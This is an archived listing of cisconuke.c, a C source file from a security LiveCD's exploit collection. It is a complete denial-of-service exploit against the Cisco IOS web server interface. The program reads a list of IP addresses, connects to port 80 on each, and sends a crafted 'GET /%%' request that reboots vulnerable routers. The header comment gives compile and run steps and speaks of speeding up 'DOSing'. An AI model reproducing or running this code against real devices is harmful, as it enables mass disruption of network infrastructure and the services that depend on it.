Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / cisco / cisconuke.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 4KB | 179 lines

/* - PRIVATE Do NOT distribute PRIVATE - Cisco IOS deficiency (web-server interface) allows an arbitrary router to be rebooted. 1. Create an IP address list (or hostnames). 2. gcc -o cisconuke cisconuke.c 3. ./cisconuke ip-address-list 4. If the target's a Cisco with open TCP/80, it goez b00m. We use a timeout because, in the event that a host resolves but is down, waiting for ETIMEDOUT would slow your DOSing down. Adjust if necessary (slow links etc). Comment out the VERBOSE #define if you don't want to see what's happening. */ #define VERBOSE #define TIMEOUT 10 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <signal.h> #include <setjmp.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> sigjmp_buf env; u_long resolve_host(u_char *host) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host)) == -1) { host_ent = gethostbyname(host); if (!host_ent) return((u_long)0); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } void net_timeout(void) { alarm(0); siglongjmp(env, 1); } int nuke_cisco(u_long dst_ip) { struct sockaddr_in sin; u_char crash[] = "GET /\%\%\n\n"; int sock; alarm (0); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = dst_ip; if (sigsetjmp(env, 1)) { /* Timeout. */ close(sock); return(-1); } alarm(TIMEOUT); signal(SIGALRM, (void *)net_timeout); if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { close(sock); return(-1); } alarm (0); if (write(sock, crash, strlen(crash)) != strlen(crash)) { close(sock); fprintf(stderr, "\nWarning: truncated write()\n"); return(-1); } close(sock); return(0); } int main(int argc, char **argv) { FILE *filez; struct in_addr addr; u_long dst_ip = 0; u_char host[255] = {0}; int nuked = 0, notnuked = 0; if (argc != 2) { fprintf(stderr, "\nusage:\t%s ip_list\n\n", argv[0]); exit(-1); } filez = fopen(argv[1], "r"); if (!filez) { fprintf(stderr, "Can't open IP address list file.\n"); exit(-1); } while (fgets(host, sizeof(host) - 1, filez) > 0) { host[strlen(host) - 1] = 0; host[strlen(host) ] = 0; dst_ip = resolve_host(host); if (dst_ip) { #ifdef VERBOSE addr.s_addr = dst_ip; fprintf(stderr, "Resolved host `%s`, killing.. ", inet_ntoa(addr)); #endif /* VERBOSE */ if (!nuke_cisco(dst_ip)) { #ifdef VERBOSE fprintf(stderr, "success.\n"); nuked++; #endif /* VERBOSE */ } else { #ifdef VERBOSE fprintf(stderr, "can't connect to TCP/80\n"); notnuked++; #endif /* VERBOSE */ } } else { #ifdef VERBOSE fprintf(stderr, "Can't resolve %s\n", host); notnuked++; #endif /* VERBOSE */ } memset(host, 0, sizeof(host)); } fprintf(stderr, "\nCompleted run:\n" "Obtained a successful connection and sent crash: %d hosts.\n" "No connection to port 80 or cannot resolve: %d hosts.\n\n", nuked, notnuked); exit(0); } /* www.hack.co.za [19 May 2000]*/